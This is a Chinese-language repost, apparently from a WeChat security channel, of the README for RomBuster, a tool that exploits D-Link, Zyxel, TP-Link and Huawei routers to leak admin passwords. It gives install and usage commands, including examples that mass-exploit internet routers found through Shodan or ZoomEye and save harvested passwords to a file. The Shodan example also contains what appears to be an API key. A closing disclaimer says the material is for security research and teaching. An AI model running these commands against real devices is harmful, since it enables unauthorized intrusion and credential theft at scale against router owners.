特征
-
漏洞利用漏洞在最流行的路由器,比如
D-Link,Zyxel,TP-Link和Huawei。 -
优化为从启用线程的列表中一次利用多个路由器。
-
简单的 CLI 和 API 使用。
安装
pip3 install git+https://github.com/EntySec/RomBuster基本用法
要使用 RomBuster,只需rombuster在您的终端中输入即可。
允许泄露网络路由器管理员密码的开发工具。
可选参数:
-h, --help 显示此帮助消息并退出-t, --threads 使用线程以加快工作速度。-o OUTPUT, --output OUTPUT 输出结果到文件。-i INPUT, --input INPUT 地址的输入文件。-a ADDRESS, --address ADDRESS 单个地址。--shodan SHODAN Shodan API密钥,用于通过 Internet开发设备。--zoomeye ZOOMEYE ZoomEye API 密钥,用于通过 Internet 开发设备。-p PAGES, --pages PAGES 要从 ZoomEye 获取的页面数。
例子
rombuster -a 192.168.99.1从 Internet 上利用
让我们尝试使用 Shodan 搜索引擎来利用 Internet 上的路由器,我们将使用它-t来快速利用。
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvg从输入文件中攻击
让我们尝试使用打开的路由器数据库-t进行快速利用。
rombuster -t -i routers.txt -o passwords.txt接口使用
RomBuster 也有自己的 Python API,可以通过将 RomBuster 导入您的代码来调用。
from rombuster import RomBuster项目地址:
https://github.com/EntySec/RomBuster
本文始发于微信公众号(Khan安全攻防实验室):RomBuster - 路由器攻击
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论